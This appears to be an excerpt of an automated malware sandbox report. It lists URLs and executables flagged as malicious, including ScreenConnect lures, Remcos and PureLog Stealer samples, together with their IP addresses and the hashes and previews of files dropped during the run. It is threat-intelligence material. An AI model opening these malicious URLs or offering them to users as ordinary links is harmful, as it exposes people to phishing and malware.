                                                                                                                                                                        http://tvsurf.jp/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                        https://docs.google.com/forms/d/e/1FAIpQLSdpweVM1inxltc4AWxPatki3D8pgrAZSJz39loK6XS45S8Ubg/viewform?usp=pp_urlGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                        http://racrodisaver.co.in/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                        https://www.elightsailorsbank.uksfholdings.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                        https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                        https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                        http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                        http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        LVLT-10753USVD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        tr5jscSEwo.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0ejD1RqkyUNm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        e6y2SzRzyr.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        ejdc7iP3A7.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        Wg3tf5MIzS.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        9gTW6ik1Z1.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        lcvKxaEBA3.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        vt4hGZq9md.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                        • 178.215.236.119
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeScan_PDF_5255303072.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                          invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                            Scan_PDF_2017163298.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                              He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                  VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                    vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                      s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                        xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                          He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                            C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeScan_PDF_5255303072.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                              invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                Scan_PDF_2017163298.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                  He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                    5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                      VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                        vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                            xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                              He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                Entropy (8bit):1.3073457884817659
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrK:KooCEYhgYEL0In
                                                                                                                                                                                                                MD5:3CC24F6D4015F70B5C168B0502A0B3E7
                                                                                                                                                                                                                SHA1:264C07C5AAADF3E606C60841A1F757F31A1F049C
                                                                                                                                                                                                                SHA-256:DECA302732378C39AC19CEACFB10BFF82BCE56A68630AA345552FACBDE01A247
                                                                                                                                                                                                                SHA-512:95CC33C6AEADA225237F23E0641CD77566258AF91D20F2183FDC72D70129A8357381056AB8A5C20907995500F5A0D15CDC97EBFF2FD9EF37CB3A8134586D50FD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x408ee56c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                Entropy (8bit):0.42213359664585876
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                                                                                                                                                                                MD5:469A42E619AF87552B24DD4965DE338A
                                                                                                                                                                                                                SHA1:C7B014E054243985F3D701EA149AA9644B7F7B27
                                                                                                                                                                                                                SHA-256:D41C3D40B143BF84CACDC09F43ED3D74029F178B6FCFB7469D09394961BE5F17
                                                                                                                                                                                                                SHA-512:94D1C00F35045D5137B4D1FA6ACCE27A9C932E38559F36B1E837CCBF59337B25AC3D8AA52C2D750C0F7DA0C0DE80842C17A70510F2F3BC6734B92AE1EB2DF276
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:@..l... .......A.......X\...;...{......................0.!..........{A......|O.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................##M}.....|..................?{3......|O..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                Entropy (8bit):0.07628756745831947
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:SmXEYeBQjWjn13a/qYFqj1lollcVO/lnlZMxZNQl:SmUzBQjW53q/qjQOewk
                                                                                                                                                                                                                MD5:F11BC635BC8112579ED261A0108A5FBF
                                                                                                                                                                                                                SHA1:8190631E46C37634E9E68239F1CC8696021FEA31
                                                                                                                                                                                                                SHA-256:7732FCF6F3E8B1F758064C85BFB0B833A5513D994870ADB91DB1BEEB019A0D3E
                                                                                                                                                                                                                SHA-512:BD47AEA97B59B6B7BB2E8ED7CB9AE32BBD788F0A9A7988FB4A3592552F082FA1FECE6DAEAFCA1B33060CD481504A9283B3E07E9A12CFB52B4BC3CFC16F964544
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.8.......................................;...{.......|O......{A..............{A......{A..........{A]................?{3......|O.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                Entropy (8bit):0.925147521992023
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:caZaEPnDP0BU/kkgjK0ozuiFXZ24IO8ks:+2nD8BU/YjkzuiFXY4IO83
                                                                                                                                                                                                                MD5:36F51B4D4BB39F3AD036BB815C6169A2
                                                                                                                                                                                                                SHA1:60FD213E80477705F7C8FCECB84D9645FF247E0A
                                                                                                                                                                                                                SHA-256:A8A77EDEFC70FE1E3BE67F094358D17FFF6C77F836A8A059D76DCF13BFC554EF
                                                                                                                                                                                                                SHA-512:A8B5A2095DA2D85F7B2C9F881965D5F832C9EAA10561B7F30B11E1A2869063EB25B11F75D01B0318639574A680D3489991137BB2A6DA830C0F7462CE10563327
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.1.6.1.7.8.2.6.6.2.2.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.1.6.1.7.9.9.0.6.8.4.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.a.6.5.7.6.a.-.6.3.8.4.-.4.9.2.7.-.8.d.4.8.-.c.2.3.4.d.c.7.7.d.3.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.5.8.c.d.b.a.-.7.7.1.9.-.4.d.c.9.-.b.3.1.c.-.d.3.1.b.8.a.9.b.e.f.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.c.a.n._.d.o.c._.0.9._.1.6._.2.4._.1.2.0.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.e.4.-.0.0.0.1.-.0.0.1.4.-.a.e.8.f.-.8.4.d.3.8.1.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.a.4.8.a.e.7.5.c.7.4.c.0.b.5.8.3.7.e.4.0.b.4.c.2.a.f.1.7.b.d.7.0.0.0.0.f.f.f.f.!.0.0.0.0.5.f.e.7.6.9.1.7.1.8.0.2.6.9.4.b.b.1.3.f.d.3.3.8.8.0.6.5.c.1.1.1.c.8.7.4.0.b.e.b.!.S.c.a.n._.d.o.c._.0.9._.1.
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Wed Oct 2 04:16:18 2024, 0x1205a4 type
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):82244
                                                                                                                                                                                                                Entropy (8bit):1.6824982200060135
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:pWKy95niHXhI/irQeW5HZptrVUttdw1H4:gKy9lihI/7eWrXrV0w1Y
                                                                                                                                                                                                                MD5:31C70CE1E95DE89B636A965F6187C452
                                                                                                                                                                                                                SHA1:182248EBD431384E254E25895F7625B2E1998485
                                                                                                                                                                                                                SHA-256:A050C15A558B987E2C175BCE7325A662ED6DCEFD254200F8148E1E8E0EDF7EB8
                                                                                                                                                                                                                SHA-512:22B0BEE5A62E0D09DB558A9BCEF204BE09EE39978DCD7179899C9D440196BEF1AD050EAED41AECF3EB1507CF3DD5C7390E522C3668A783CE61D549C0D9BFC9A8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MDMP..a..... ..........f....................................4....;..........T.......8...........T............!.............. ...........................................................................................eJ..............GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8376
                                                                                                                                                                                                                Entropy (8bit):3.7024193425380454
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJ786Y6Y96SUedgmfztYprO89be0sfjKm:R6lXJQ6Y6YwSUedgmfztCenfP
                                                                                                                                                                                                                MD5:FD90A4D2AE409CB4E71CC6C43F34E287
                                                                                                                                                                                                                SHA1:9065A27C8657F599248EA8B05738523E4EBAA02D
                                                                                                                                                                                                                SHA-256:403FD04F400F0342395139C122B302B4BB5C5528769CEAB94AC9CB281C9058BB
                                                                                                                                                                                                                SHA-512:A6628E735908B4628B9FD9172C9DE07D0DBE44467CADCB096C5E6361EF2B3A162EFE577B9916015DF4E882CEA55945EE8102A16B075BD9CBB24E20AFD59F9078
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.4.0.<./.P.i.
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4653
                                                                                                                                                                                                                Entropy (8bit):4.500441631102047
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsrJg77aI9w7WpW8VYRYm8M4Jq/5yLF7M+q8/ItyZBkJId:uIjfFI7iK7VBJ25OMm4nJId
                                                                                                                                                                                                                MD5:1F67F8B49F7A670581CD911943E335A7
                                                                                                                                                                                                                SHA1:7795446E5E8350AD3ACF203C10E7765F5506ED0C
                                                                                                                                                                                                                SHA-256:7DE19EC8E12C702A07586BB1EF5A1ED7BB300E108AE0F0EE3E365B53EC37F274
                                                                                                                                                                                                                SHA-512:B0FD3F1899776A4CFF8DEA8A6BE72FA48C138C1CD9BA4658E20F3E3E0B7E297C7F78BFD316EE662E5E2C5C67BB2134A4D123063338001F115237057E351757E4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525319" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):80572
                                                                                                                                                                                                                Entropy (8bit):3.0753010545679524
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:5FojQVHWlljA/Aqa8h6Pp6U01T70ZbFyopFFtZu/Wbm9yzoI:5j8lljh8q01Z70lFyoTwubm9ov
                                                                                                                                                                                                                MD5:9454CFF38B4FF9A7C6154508935F091B
                                                                                                                                                                                                                SHA1:2F05E39FF0971FCEA393629B440B40F700A20977
                                                                                                                                                                                                                SHA-256:AE5063A9459178A27F452CA2C1AB44F8D0470CE687D45773BEAE7CF6920CD052
                                                                                                                                                                                                                SHA-512:03EFBBFD4F85C7AF6B1A8C6F647BCE1569DA3D054CF2D795FCE854D57788CFD2AB5344D15EA250297CA354A8620CEFEEF2ABA4E82386BA64065778524B8510FC
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                Entropy (8bit):2.685181778262058
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:TiZYWiizzpmUY4Y0Wr4JHSAUYEZ7ztEim4dfVwrAida1W6M404IlK3:2ZDDPUgta1W6M40flK3
                                                                                                                                                                                                                MD5:91ACE65333E992FAB5E9B7422BD297B5
                                                                                                                                                                                                                SHA1:D66E15373F94D06242FA55ECC086DBE612DA54F7
                                                                                                                                                                                                                SHA-256:93D6C0F92870638E69A2E450C447037A269D47F7BAB1E002BACBB8A3C42DD9B0
                                                                                                                                                                                                                SHA-512:68C990A36B21FF1937A56D39DCFC67AAFA5006E9C6EF9F33593FF33E996829160F3A863773FBF726684B3599A30E80D3BC32FCE789EF09F84C1032DF6158EB6D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1716
                                                                                                                                                                                                                Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):727
                                                                                                                                                                                                                Entropy (8bit):7.552295515462603
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:5onfZHlc5RlRtBfQtlUxsywrhX0DHXXD6svZJ7YCSVXAdaAaN7tEn/BTGpq78S5z:5iplcdZslUxWQWSiVXAD2ZEZic8wz
                                                                                                                                                                                                                MD5:D3E1E6C22706565D07C5B9CF083E39F6
                                                                                                                                                                                                                SHA1:12D3BC9406E47A98818A8E21DEEED08DAF79B029
                                                                                                                                                                                                                SHA-256:AA5381F9A094B86DEE378100BA11AF301FA9B2E0B5E508D6023E06CCD3A2A60B
                                                                                                                                                                                                                SHA-512:BCA97221A6320F9C29A237D2F6FD824713072549F2EB879C963D2C8326493FCD03CEB3B94E737ADE4A312CB8331B14865F2F208A73F566A6E08786577FE3B273
                                                                                                                                                                                                                Malicious:false
